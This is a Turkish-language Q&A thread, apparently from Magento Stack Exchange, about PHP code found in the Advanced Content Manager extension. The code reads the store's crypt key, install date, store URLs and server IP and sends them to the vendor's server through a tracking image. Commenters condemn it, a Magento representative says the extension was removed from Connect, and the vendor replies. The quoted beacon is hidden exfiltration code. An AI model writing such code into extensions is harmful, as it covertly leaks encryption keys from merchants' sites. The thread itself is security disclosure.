Bir modülün global / crypt / anahtarına uzaktan erişmesinin iyi bir nedeni var mı?

Cehaletimi affet, ama crypt anahtarı Magento verilerinin şifresini çözmek için kullanılıyor, değil mi? Bir modülün buna erişmesi için iyi bir neden var mı? Gelişmiş İçerik Yöneticisi'ni yükledikten sonra bu kodla karşılaştım ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

magento-1.9

— TylersSN
kaynak

BU. DIR-DİR. KORKUNÇ. Şifreleme anahtarınızı sızdırmak için hiçbir neden yoktur.

— Fabian Blechschmidt

Bu kötü, çok kötü.

— Anna Völkl

İyi yakaladın! Bu son derece kötü ...

— Sander Mangel

Bize söylediğin için teşekkürler @Sander. Connect'ten kaldırıldı.

— benmarks

@benmarks bunu duyduğuma sevindim. Bu, bariz nedenlerden dolayı son derece hayal kırıklığı yaratıyor, çünkü uygulama son derece etkileyici ve geliştirici geçmişte son derece yararlı ve hızlıydı.

— TylersSN

Yanıtlar:

Evet ... bunun iyi bir nedeni var.
Her ihtimale karşı bilmek ve kayıt altına almak istiyorlar. :)

Uzantıyı kaldırmalısınız (büyük olasılıkla zaten yapmışsınızdır). Hangi veriyi eve gönderdiklerinden bağımsız olarak, asla "telefon ana sayfası" uzantılarını kullanmamalısınız.

Diğerlerinin görmesi için uzantıyı burada listelemek isteyebilirsiniz: Magento Uzantılarından Komik / Yararsız / Korkunç kod

— Marius
kaynak

"eve telefon ederek" maalesef birçok modül tarafından yapılır. Amasty ve Aheadworks de bunu yapıyor: \

— Sander Mangel

Bu gist.github.com/miguelbalparda/b57a47a010a5995bc44d , uygulama / kod / çekirdek tüm klasörlerinde CLI'den global / crypt / anahtarını kontrol etmek için kullanılabilir.

— mbalparda

Yani sadece cc veri şifresini çözmek mümkün değil (iyi bir şey onu kaydetmek değil) şifreleri, vb .. Ama ben bu yeteneği için 300 $ ödedi. Komik'e gönderilmesi gereken budur.

— TylersSN

@iUseMagentoNow. Bu komik "ooh", komik değil "ha ha". Paranızı geri istemelisiniz.

— Marius

Bugün bu özellik hakkında destek talebi aldık. Zaten çözdük ve bu kod parçasını kaldırdık. Müşteriler alanındaki tüm müşterilerimiz için yeni bir sürüm mevcut (sınırsız güncelleme sunduğumuz için ücretsiz).

Bunu haklı çıkarmamız gerektiğini biliyorum, hadi şunu yapalım:

Bu izleyicinin amacı SADECE uzantımızın izinsiz kullanımını takip etmekti.
İzleyici yalnızca yönetici alanında görüntülendi (müşterilerinizden hiçbiri veya siz ve bizden başka herhangi biri bunu göremedi).
Biz de bizim DB kaldı.
Anahtar sadece yönetici şifrenizi şifrelemektir. Destek talepleri doğrultusunda hepinizle çalışmak için kullandığımız için, kimlik bilgilerinizi zaten e-posta yoluyla bize destek için göndermiş olabilirsiniz. Parolanızı isteseydik, doğrudan gönderirdik ... Amaç bu değildi.
Anahtarla bile, şifreniz hala şifrelenir. Ve magento admin bazı girişimlerden sonra kullanıcıyı engeller.

Bunun bir hata olduğunun farkındayız ve bu topluluğun ve açık kaynak sisteminin gücüdür: daha hızlı düzeltebilir ve geliştirebiliriz. Bizi uyardığınız için hepinize teşekkür ederiz, şimdi güvenlik açığı konusunda daha fazla çaba göstereceğiz.

— Gelişmiş İçerik yöneticisi
kaynak

+1 burada Magento SE'de halka açık şekilde yanıt vermek için çaba harcadığınız için!

— 7ochem

Uzantının izinsiz kullanımı ?! Bunun için alan adını kullanabilirsiniz.

— mbalparda